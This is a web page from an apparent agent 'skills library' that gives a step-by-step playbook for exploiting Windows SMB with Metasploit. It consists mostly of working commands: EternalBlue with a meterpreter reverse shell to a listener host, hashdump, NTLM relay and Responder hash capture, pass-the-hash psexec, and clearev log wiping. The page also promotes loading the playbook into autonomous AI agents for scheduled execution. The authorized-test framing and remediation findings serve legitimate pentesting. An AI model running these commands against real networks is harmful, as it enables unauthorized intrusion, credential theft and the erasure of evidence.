CG
SkillsExploiting Smb Vulnerabilities with Metasploit
Start Free
Back to Skills Library
Network Security🔴 Advanced

Exploiting Smb Vulnerabilities with Metasploit

Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks.

6 min read7 code examples

Prerequisites

  • Metasploit Framework 6.x installed (`msfconsole --version`)
  • Authorized penetration test scope document listing target IP ranges and approved attack types
  • Network access to target SMB services (TCP 445, TCP 139)
  • CrackMapExec and Impacket tools installed for complementary SMB testing
  • Valid test credentials or credential wordlists approved for the engagement
  • Kali Linux or equivalent testing platform

Exploiting SMB Vulnerabilities with Metasploit

When to Use

  • Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
  • Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
  • Validating that patch management processes have addressed known SMB vulnerabilities
  • Assessing SMB signing enforcement and share permission configurations across the domain
  • Testing network segmentation by attempting SMB exploitation across VLAN boundaries

Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.

Prerequisites

  • Metasploit Framework 6.x installed (msfconsole --version)
  • Authorized penetration test scope document listing target IP ranges and approved attack types
  • Network access to target SMB services (TCP 445, TCP 139)
  • CrackMapExec and Impacket tools installed for complementary SMB testing
  • Valid test credentials or credential wordlists approved for the engagement
  • Kali Linux or equivalent testing platform

Workflow

Step 1: Enumerate SMB Services and Versions

# Discover hosts with SMB open using Nmap
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

# Enumerate SMB versions and OS information
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

# Use CrackMapExec for rapid SMB enumeration
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

# Check SMB signing status (disabled = vulnerable to relay)
crackmapexec smb 10.10.0.0/24 --smb-signing

# Enumerate shares with null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares

Step 2: Scan for Known SMB Vulnerabilities

# Start Metasploit and scan for MS17-010 (EternalBlue)
msfconsole -q
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010)> set THREADS 10
msf6 auxiliary(smb_ms17_010)> run

# Scan for MS08-067 (Conficker vulnerability)
msf6> use auxiliary/scanner/smb/ms08_067_check
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(ms08_067_check)> run

# Check for SMBGhost (CVE-2020-0796)
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

# Check for PrintNightmare (CVE-2021-34527)
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare

Step 3: Exploit EternalBlue (MS17-010)

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit

# Post-exploitation -- verify access level
meterpreter> getuid
# Server username: NT AUTHORITY\SYSTEM

meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> hashdump

Step 4: Perform SMB Relay Attack

# Identify hosts without SMB signing (from Step 1)
# Set up NTLM relay with Impacket
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

# Trigger authentication from a compromised host or via phishing
# From Meterpreter session on a compromised host:
meterpreter> shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password

# Or use Metasploit's SMB relay module
msf6> use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
msf6 exploit(smb_relay)> exploit

# Use responder to capture NTLM hashes for offline cracking
sudo responder -I eth0 -wrfv

Step 5: Pass-the-Hash and Lateral Movement via SMB

# Extract hashes from compromised system
meterpreter> hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

# Use pass-the-hash with CrackMapExec
crackmapexec smb 10.10.0.0/24 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 --shares

# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"

# Use Impacket psexec for interactive shell
impacket-psexec Administrator@10.10.5.30 \
  -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Use Metasploit psexec module
msf6> use exploit/windows/smb/psexec
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
msf6 exploit(psexec)> set SMBUser Administrator
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec)> set LHOST 10.10.1.99
msf6 exploit(psexec)> exploit

Step 6: Document Findings and Clean Up

# Document all compromised systems and access levels
# In Meterpreter, screenshot desktops for evidence
meterpreter> screenshot

# List accessible shares and sensitive data
meterpreter> shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b

# Clean up -- remove any artifacts
meterpreter> clearev
meterpreter> shell
C:\> del /f C:\Windows\Temp\payload.exe

# Close all sessions
msf6> sessions -K

# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"

Key Concepts

TermDefinition
EternalBlue (MS17-010)Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers
SMB SigningCryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts
Pass-the-HashAuthentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash
NTLM RelayAttack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user
PsExecRemote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM
Null SessionAnonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems

Tools & Systems

  • Metasploit Framework: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
  • CrackMapExec: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
  • Impacket: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
  • Responder: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
  • enum4linux-ng: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts

Common Scenarios

Scenario: Internal Penetration Test Targeting Windows Domain via SMB

Context: During an internal penetration test for a financial services firm, the security assessor has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.

Approach:

  1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
  2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
  3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
  4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
  5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
  6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
  7. Document the complete attack chain showing how one unpatched system led to full domain compromise

Pitfalls:

  • EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
  • Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
  • Performing hashdump on domain controllers with large databases can cause performance degradation
  • Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available

Output Format

## SMB Vulnerability Assessment Report

**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187

### Critical Findings

**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1

**Finding 2: SMB Signing Disabled - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Enable SMB signing via Group Policy

**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)

Verification Criteria

Confirm successful execution by validating:

  • [ ] All prerequisite tools and access requirements are satisfied
  • [ ] Each workflow step completed without errors
  • [ ] Output matches expected format and contains expected data
  • [ ] No security warnings or misconfigurations detected
  • [ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC6.6 (System Boundaries), CC6.7 (Restriction on Transmission)
  • ISO 27001: A.13.1 (Network Security), A.13.2 (Information Transfer)
  • NIST 800-53: SC-7 (Boundary Protection), AC-17 (Remote Access), SI-4 (System Monitoring)
  • NIST CSF: PR.AC (Access Control), PR.PT (Protective Technology)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

# Install via CLI
npx claw-grc skills add exploiting-smb-vulnerabilities-with-metasploit

# Or load dynamically via MCP
grc.load_skill("exploiting-smb-vulnerabilities-with-metasploit")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Use with Claw GRC Agents

This skill is fully compatible with Claw GRC's autonomous agent system. Deploy it to any registered agent via MCP, and every execution will be logged in the tamper-evident audit trail.

// Load this skill in your agent
npx claw-grc skills add exploiting-smb-vulnerabilities-with-metasploit
// Or via MCP
grc.load_skill("exploiting-smb-vulnerabilities-with-metasploit")

Tags

network-securitysmbmetasploitexploitationeternalblue

Related Skills

Red Team & Offensive Security

Exploiting Ms17 010 Eternalblue Vulnerability

3m·advanced
Network Security

Exploiting BGP Hijacking Vulnerabilities

7m·advanced
Network Security

Exploiting Ipv6 Vulnerabilities

8m·advanced
Network Security

Scanning Network with Nmap Advanced

6m·advanced
Network Security

Analyzing Network Traffic with Wireshark

6m·intermediate
Network Security

Conducting Man in the Middle Attack Simulation

7m·intermediate

Skill Details

Domain
Network Security
Difficulty
advanced
Read Time
6 min
Code Examples
7

On This Page

When to UsePrerequisitesWorkflowKey ConceptsTools & SystemsCommon ScenariosOutput FormatSMB Vulnerability Assessment ReportVerification CriteriaCompliance Framework MappingDeploying This Skill with Claw GRC

Deploy This Skill

Add this skill to your Claw GRC agent and start automating.

Get Started Free →